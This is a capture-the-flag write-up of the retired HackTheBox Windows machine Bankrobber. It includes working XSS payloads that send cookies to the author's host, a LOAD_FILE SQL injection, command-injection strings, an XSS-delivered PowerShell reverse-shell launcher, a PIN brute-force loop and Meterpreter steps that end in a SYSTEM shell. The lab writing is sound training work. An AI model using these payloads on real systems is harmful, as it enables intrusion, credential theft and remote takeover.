HackTheBox - Bankrobber 💰💰

❯ PΛYΛƧ0

20-02-2020

ctf, pentest, rce, retired, sql-injection, windows, xss

HackTheBox-Bankrobber/bank-detail.png

Quick Summary

→ Insane machine – Bankrobber is a Web Application that vulnerable to XSS, SQL Injection and RCE that I have to exploit to get the Admin credentials by using XSS.
SQL Injection to study how’s the backdoorchecker.php work, do command injection inside the machine from Web Application to get a reverse shell.
Inside the machine’ I did portforwarding to test the E-Coin transfer’ from there I managed to inject RCE and get the root.

Penetration Testing Methodologies

Network Scanning

→ Nmap scan

→ discover open ports and what services are running
Enumeration

→ Browsing the HTTP Service

→ MySQL and SMB open

→ Bruteforce the Web page directories
Post - Exploitation

→ Create account and Login

→ Transfer any amount of e-coin

→ Do client side attack

→ Use XSS to steal admin credentials

→ Login as admin and find some interesting in the page
Exploitation

→ Found an XSS and SQL Injection vulnerabilites in search.php and backdoorchecker.php

→ Upload a webshell to the server and get a reverse shell
Privilege Escalation

→ Use winPE. a tool that will enumerate for potential privilege escalation

→ Looking at running process and active connections inside the machine

→ Use obfuscated meterpreter and tunnel the network with Portforwarding

→ Bruteforce the digit code and test the E-coin transfer

→ Found RCE(Remote Code Execution) in E-coin transfer

→ Gain the Administrator shell

Network Scanning

Walkthrough

→ First, I run the Nmap to scan the target and get information about the various services that are running on the target machine. I use

-sV ⇒ Probe open ports to determine service/version info
-sC ⇒ equivalent to —script=default
-p- ⇒ Scan all 65535 ports
-oN ⇒ to save our scan results to a text file

# sh
nmap -sV -sC -p- 10.10.10.154 -oN nmap-Bankrobber

Nmap results

Which found opened ports 80, 443, 445 and 3306

# sh

root in htb/boxes/Bankrobber 
❯ nmap -sV -sC -p- nmap-bankrobber -oN 10.10.10.154
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-08 03:12 PST
Nmap scan report for 10.10.10.154
Host is up (0.23s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  tcpwrapped
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp  open  tcpwrapped
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: Bad request!
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  tcpwrapped
3306/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2008|10|Phone (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 10 1511 - 1607 (85%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%)
No exact OS matches for host (test conditions non-ideal).

Host script results:
|_clock-skew: mean: 1h02m13s, deviation: 0s, median: 1h02m13s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-07T20:15:16
|_  start_date: 2020-03-07T10:51:24

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.81 seconds

root in htb/boxes/Bankrobber took 1m19s 
❯

Enumeration

I visited the web page in port 80 and it’s present a Bitcoin web page with Login and Register form.

HackTheBox-Bankrobber/web-page.gif

MySQL on port 3306

The MySQL port is open so I try to connect with it but it couldn’t

# sh

root in htb/boxes/Bankrobber 
❯ mysql -h 10.10.10.154 --port 3306
ERROR 1130 (HY000): Host '10.10.15.71' is not allowed to connect to this MariaDB server

SMB on port 445

connecting to SMB is not helpful too.

# sh

root in htb/boxes/Bankrobber took 2s 
❯ smbmap -H 10.10.10.154 -u bank
[+] Finding open SMB ports....
[!] Authentication error on 10.10.10.154
[!] Authentication error on 10.10.10.154

Brutefore Web directories

I also run dirsearch Web path scanner to look if there’s any interesting web directories.

# python

root in dirsearch on  master via 🐍 v2.7.17 
❯ ./dirsearch.py -u "http://10.10.10.154" -e asd -t 50

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: asd | HTTP method: get | Threads: 50 | Wordlist size: 6109

Error Log: /opt/dirsearch/logs/errors-20-03-06_18-13-45.log

Target: http://10.10.10.154

[18:13:46] Starting: 
[18:13:47] 403 -    1KB - /%3f/        
[18:13:47] 403 -    1KB - /%20../
[18:13:47] 403 -    1KB - /%ff/             
[18:13:49] 403 -    1KB - /.htaccessOLD                             
[18:13:49] 403 -    1KB - /.ht_wsr.txt     
[18:13:49] 403 -    1KB - /.htaccess-marco
[18:13:49] 403 -    1KB - /.htaccess-local
[18:13:49] 403 -    1KB - /.hta
[18:13:49] 403 -    1KB - /.htaccess-dev
[18:13:49] 403 -    1KB - /.htaccess.sample
[18:13:49] 403 -    1KB - /.htaccess.BAK
[18:13:49] 403 -    1KB - /.htaccess_orig
[18:13:49] 403 -    1KB - /.htaccess.bak1
[18:13:49] 403 -    1KB - /.htaccess.txt
[18:13:49] 403 -    1KB - /.htaccess_sc
[18:13:49] 403 -    1KB - /.htaccess.old
[18:13:49] 403 -    1KB - /.htaccess_extra
[18:13:49] 403 -    1KB - /.htaccess.orig
[18:13:49] 403 -    1KB - /.htaccess.save
[18:13:49] 403 -    1KB - /.htaccessOLD2
[18:13:49] 403 -    1KB - /.htaccess~
[18:13:49] 403 -    1KB - /.htaccessBAK
[18:13:49] 403 -    1KB - /.htgroup
[18:13:49] 403 -    1KB - /.htpasswd-old
[18:13:49] 403 -    1KB - /.htpasswd_test
[18:13:49] 403 -    1KB - /.htpasswds
[18:13:49] 403 -    1KB - /.htusers
[18:13:54] 301 -  336B  - /Admin  ->  http://10.10.10.154/Admin/                 
[18:13:54] 301 -  336B  - /admin  ->  http://10.10.10.154/admin/
[18:13:54] 200 -   40B  - /admin%20/          
[18:13:54] 301 -  336B  - /ADMIN  ->  http://10.10.10.154/ADMIN/
[18:13:54] 301 -  337B  - /admin.  ->  http://10.10.10.154/admin./
[18:13:55] 403 -    1KB - /admin/.htaccess   
[18:13:55] 200 -   40B  - /admin/?/login
[18:13:55] 200 -   40B  - /admin/                
[18:13:55] 200 -   40B  - /admin/index.php                                                                  
[18:14:05] 403 -    1KB - /cgi-bin/                                                                               
[18:14:10] 301 -  334B  - /css  ->  http://10.10.10.154/css/                   
[18:14:15] 403 -    1KB - /error/                                         
[18:14:17] 503 -    1KB - /examples/servlets/index.html                                               
[18:14:17] 503 -    1KB - /examples/servlets/servlet/RequestHeaderExample
[18:14:17] 503 -    1KB - /examples/servlets/servlet/CookieExample
[18:14:17] 503 -    1KB - /examples 
[18:14:17] 503 -    1KB - /examples/
[18:14:17] 301 -  336B  - /fonts  ->  http://10.10.10.154/fonts/
[18:14:21] 301 -  334B  - /img  ->  http://10.10.10.154/img/                        
[18:14:22] 200 -    8KB - /index.PHP                                                         
[18:14:22] 200 -    8KB - /INDEX.PHP                                                                           
[18:14:22] 200 -    8KB - /index.php
[18:14:22] 200 -    8KB - /index.php/login/
[18:14:24] 301 -  333B  - /js  ->  http://10.10.10.154/js/                                              
[18:14:26] 302 -    0B  - /login.php  ->  index.php                                     
[18:14:32] 403 -    1KB - /phpmyadmin                                                   
[18:14:34] 403 -    1KB - /phpmyadmin/                                  
[18:14:34] 403 -    1KB - /phpmyadmin/scripts/setup.php
[18:14:36] 200 -    0B  - /register.php                                                        
[18:14:37] 403 -    1KB - /server-info                                                                  
[18:14:37] 403 -    1KB - /server-status
[18:14:37] 403 -    1KB - /server-status/ 
[18:14:45] 403 -    1KB - Trace.axd::$DATA                                                                        
[18:14:45] 301 -  335B  - /user  ->  http://10.10.10.154/user/              
[18:14:45] 200 -   39B  - /user/         
[18:14:46] 403 -    1KB - web.config::$DATA                          
                                                                                        
Task Completed                                                                                                                                                                                                                    
root in dirsearch on  master via 🐍 v2.7.17 took 1m3s 
❯

things that caught my attention is this web directories

# sh

[18:13:55] 200 -   40B  - /admin/?/login
[18:13:55] 200 -   40B  - /admin/                
[18:13:55] 200 -   40B  - /admin/index.php

Post - Exploitation

To test’ I created an account and login it too. Next,
I visited the /admin/index.php and says You're not authorized to view this page for me this is really weird, if you have experience in Web development you will notice that there was an misconfigured in this website.

HackTheBox-Bankrobber/admin.png

Steal Admin creds via Cookies

Now I need to get the credentials of the admin. I try to look on the page source of the web page to look for hint but I did not see anything.
then I try the e-coin transfer in user page and this alert caught my attention.

HackTheBox-Bankrobber/transfer.png

It looks like the admin is checking each transfer transaction, so I intercept it with BurpSuite (A Web Penetration Testing tool)

HackTheBox-Bankrobber/bank-burp1.png

Using this payload from PayloadAllTheThings

# xss

<img src=x onerror=this.src="http://10.10.15.71/?c="%2bdocument.cookie>

my user id # here is ID #4, my username and password in on base64 code format.
toId= is the id where I transfer my e-coin. I set first my nc listener on port 80 then I modify the response with my payload and send it.

HackTheBox-Bankrobber/bank-burp-send.png

after 5-10 minutes of waiting, I’ll get a response in my nc listener and it’s the username and password of the admin in base64 code format.
Convert it to plaintext and I got now the admin creds.

HackTheBox-Bankrobber/bank-admin-creds.png


username:   admin
password:   Hopelessromantic

Now that I have the admin credentials, login as admin, and find some interesting capabilities.
and there’s a NOTES.TXT inside of the Admin page.

HackTheBox-Bankrobber/bank-notes-web.png

Looking at the notes.

HackTheBox-Bankrobber/bank-notes1.png

I don’t know what that means, but there are two things that I’m sure of.
⇒ default Xampp installation folder is in the C:\xampp\htdocs\ where you can run a local web server.
⇒ There’s was a vulnerability in the encode comments. For every IP address.

Next, the two interesting things I found inside the admin page – Search users and Backdoorchecker.
I try to search my ID # in search users (beta) when you say beta it’s not fully functional, there was an existing bugs and errors with that.

HackTheBox-Bankrobber/my-id.png

Backdoorchecker

HackTheBox-Bankrobber/bank-backdoorchecker.png

⇒ Due to recent hacking attemps on the server, Backdoorcheker features is only accessible from the localhost because it returns the following message when I try any commands:

dir

There’s a possibility that this features is vulnerable to SQLi.

Exploitation

XSS and SQL Injection

I try to intercept the search users function using BurpSuite and try SQL Injection.

term=4 is my user ID # then sending this to repeater, I put this sql syntax to check how’s backdoorchecker.php work.

# sql

term=4' union all select 1,LOAD_FILE('C:\\xampp\\htdocs\\admin\\backdoorchecker.php'),3-- -

and I got this response.

# php

HTTP/1.1 200 OK
Date: Sun, 08 Mar 2020 20:30:14 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
X-Powered-By: PHP/7.3.4
Content-Length: 1169
Connection: close
Content-Type: text/html; charset=UTF-8


<table width='90%'><tr><th>ID</th><th>User</th></tr>
   <tr>
      <td>4</td>
      <td>medz</td>
   </tr>
      
   <tr>
      <td>1</td>
      <td><?php

   include('../link.php');
   include('auth.php');

      
   $username = base64_decode(urldecode($_COOKIE['username']));
   $password = base64_decode(urldecode($_COOKIE['password']));
   $bad    = array('$(','&');
   $good      = "ls";

      if(strtolower(substr(PHP_OS,0,3)) == "win"){
         $good = "dir";
         }
         
         if($username == "admin" && $password == "Hopelessromantic"){
            if(isset($_POST['cmd'])){
                  // FILTER ESCAPE CHARS
                  foreach($bad as $char){
                     if(strpos($_POST['cmd'],$char) !== false){
                        die("You're not allowed to do that.");
                     }
                  }

            // CHECK IF THE FIRST 2 CHARS ARE LS
            if(substr($_POST['cmd'], 0,strlen($good)) != $good){
               die("It's only allowed to use the $good command");
            }

               if($_SERVER['REMOTE_ADDR'] == "::1"){
                  system($_POST['cmd']);
                  }
                  else
                  {
                     echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
               }
            }
         }
         else
         {
            echo "You are not allowed to use this function!";
         }
         ?>
      </td>
      </tr>
   </table>

– sql injection
HackTheBox-Bankrobber/bank-sql-injection.png

It returns to send the request from localhost and the first 3 characters must be “dir” and you can use the characters $(" or '&'")

To execute code I use the PhantomJS bot (via XSS) to send a post request to backdoorchecker.php with a code execution bypass inside the parameter.
I ping my Kali linux machine and set tcpdump. I used:


dirasdf || ping 10.10.15.71

HackTheBox-Bankrobber/bank-ping.png

and my Kali Linux get a response from Bankrobber


root in htb/boxes/Bankrobber 
❯ tcpdump -i tun0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
07:25:28.957530 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421326422 ecr 0,nop,wscale 7], length 0
07:25:29.208067 IP 10.10.15.71.41238 > 10.10.10.154.http: Flags [S], seq 339059589, win 64240, options [mss 1460,sackOK,TS val 2421326672 ecr 0,nop,wscale 7], length 0
07:25:29.967531 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421327432 ecr 0,nop,wscale 7], length 0
07:25:30.222861 IP 10.10.15.71.41238 > 10.10.10.154.http: Flags [S], seq 339059589, win 64240, options [mss 1460,sackOK,TS val 2421327687 ecr 0,nop,wscale 7], length 0
07:25:31.983082 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421329447 ecr 0,nop,wscale 7], length 0
07:25:32.239634 IP 10.10.15.71.41238 > 10.10.10.154.http: Flags [S], seq 339059589, win 64240, options [mss 1460,sackOK,TS val 2421329704 ecr 0,nop,wscale 7], length 0
07:25:34.209667 IP 10.10.15.71.41240 > 10.10.10.154.http: Flags [S], seq 232555969, win 64240, options [mss 1460,sackOK,TS val 2421331674 ecr 0,nop,wscale 7], length 0
07:25:35.215733 IP 10.10.15.71.41240 > 10.10.10.154.http: Flags [S], seq 232555969, win 64240, options [mss 1460,sackOK,TS val 2421332680 ecr 0,nop,wscale 7], length 0
07:25:36.015323 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421333479 ecr 0,nop,wscale 7], length 0
07:25:37.231355 IP 10.10.15.71.41240 > 10.10.10.154.http: Flags [S], seq 232555969, win 64240, options [mss 1460,sackOK,TS val 2421334695 ecr 0,nop,wscale 7], length 0
07:25:44.207219 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421341671 ecr 0,nop,wscale 7], length 0
07:26:00.335356 IP 10.10.15.71.41236 > 10.10.10.154.http: Flags [S], seq 2958480018, win 64240, options [mss 1460,sackOK,TS val 2421357799 ecr 0,nop,wscale 7], length 0

Get Reverse Shell

To exploit this vulnerabilities and get a reverse shell. I used Nishang - Offensive PowerShell for red team, penetration testing and offensive security. I use the script, Invoke-PowerShellTcp.ps1 and named it to evil.ps1.
I called it using powershell through an Impacket Samba Server and setup an nc listener to my Kali Linux.

# javascript

<script>var xh;if (window.XMLHttpRequest) {xh=new XMLHttpRequest()}else{xh=new ActiveXObject("Microsoft.XMLHTTP")};xh.open("POST","/admin/backdoorchecker.php");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xh.send("cmd=dirasdf || copy \\\\10.10.15.71\\test\\dfuck");</script>&amount=<script>var xh;if (window.XMLHttpRequest) {xh=new XMLHttpRequest()}else{xh=new ActiveXObject("Microsoft.XMLHTTP")};xh.open("POST","/admin/backdoorchecker.php");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xh.send("cmd=dirasdf || copy \\\\10.10.15.71\\test\\dfuck");</script>&comment=<script>var xh;if (window.XMLHttpRequest) {xh=new XMLHttpRequest()}else{xh=new ActiveXObject("Microsoft.XMLHTTP")};xh.open("POST","/admin/backdoorchecker.php");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xh.send("cmd=dirasdf || powershell -exec bypass -f \\\\10.10.15.71\\test\\evil.ps1");</script>

HackTheBox-Bankrobber/bank-XSS.png

after 5-10 minutes, my impacket-smbserver got a response and get in into the Bankrobber machine.

HackTheBox-Bankrobber/bank-impacket.png

HackTheBox-Bankrobber/bank-initial-shell.png

and finally I have now the user.txt

HackTheBox-Bankrobber/bank-user.png

Privilege Escalation

Recon

Doing some Reconnaissance, I used winPE or Windows privilege escalation with cmd it’s a tool similar to LinEnum.

It can help with automating Penetration Tests. It performs a discovery on the environment it runs in and tries finding weaknesses to allow privilege escalation. Saving time and allowing more effort to be put toward getting root.

Process and Active Connections

running this takes time. after 10-15 minutes I’ve got now the response.

System Info of Bankrobber
HackTheBox-Bankrobber/bank-winPE.png

I see something’s odd running on port 910
HackTheBox-Bankrobber/bank-910.png

And a suspicious running on the background process named – bankv2.exe is the same PID #1632 in port 910
HackTheBox-Bankrobber/bank-bankv2.png

Customizing custom Meterpreter loader

so I tunnel my local port 910 in my Kali Linux system to the port 910 of the Bankrobber. To do so I created an obfuscated meterpreter.

see this:
https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/

run the bash script and check the payload file

# bash
****************************************************************
    Automatic C source code generator - FOR METASPLOIT          
           Based on rsmudge metasploit-loader                   
****************************************************************
Metasploit server IP : 10.10.15.71
Metasploit port number : 9001
Compiling binary ..
In file included from temp.c:4:
/usr/share/mingw-w64/include/winsock2.h:15:2: warning: #warning Please include winsock2.h before windows.h [-Wcpp]
 #warning Please include winsock2.h before windows.h
  ^~~~~~~
-rwxr-xr-x 1 root root 292503 Mar  8 09:08 payload.exe

HackTheBox-Bankrobber/bank-payload.png

I uploaded it to the Bankrobber and execute it, then I setup a meterpreter session:

Metasploit meterpreter

HackTheBox-Bankrobber/bank-metasploit.png

Now that I have the meterpreter session next I did is Port forwarding

# bash

root in htb/boxes/Bankrobber
meterpreter > portfwd add -l 910 -p 910 -r 127.0.0.1
[*] Local TCP relay created: :910 <-> 127.0.0.1:910

And connect it to the port using nc -vn 127.0.0.1 910 and it works! Next I try to input a digit code – 1234 but it’s not working.

HackTheBox-Bankrobber/bank-pincodewr.png

Brute force the `digit code`

Since I don’t know what is the exact digit code here, I decided to bruteforce it using bash command line even that I have a feeling that I could get blocked by doing this. so

# bash

root in htb/boxes/Bankrobber
❯ for i in {0...9}{0...9}{0...9}{0...9}; do echo $i; echo $i | nc -vn 127.0.0.1 910; done

After a seconds’ I get now the right digit code – 0021

HackTheBox-Bankrobber/bank-right-pin.png

When I log in with this PIN, I can transfer e-coins and I see that the transfer.exe process inside is executed:

⇒ [$] Executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe

HackTheBox-Bankrobber/bank-transfer0021.png

Remote Code Execution (RCE)

Now, theres a possible RCE on that process.
I exploited the E-coin transfer by running my payload inside the Bankrobber machine’ and create meterpreter sessions.
Instead of putting amount of E-Coins in e-coin transfer. I executed my payload with this line.

# bash
& ..\\..\\..\\..\\..\\..\Users\\C:\Users\Cortin\payload.exe

HackTheBox-Bankrobber/bank-RCE.png

After executed it i got a response from my meterpreter sessions.

HackTheBox-Bankrobber/bank-metasploit-root.png

Administrator Shell

# bash

root in htb/boxes/Bankrobber
meterpreter > shell
Process 584 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. Alle rechten voorbehouden.

and Finally rooted !
⇒ nt authority\system
HackTheBox-Bankrobber/bank-rooted!.png

Get root.txt
HackTheBox-Bankrobber/bank-root.png

If you liked my writeup please leave a respect on my Profile

Referrences:
Port 910

Port 910

Customize Meterpreter Payload

XSS with Phantom JS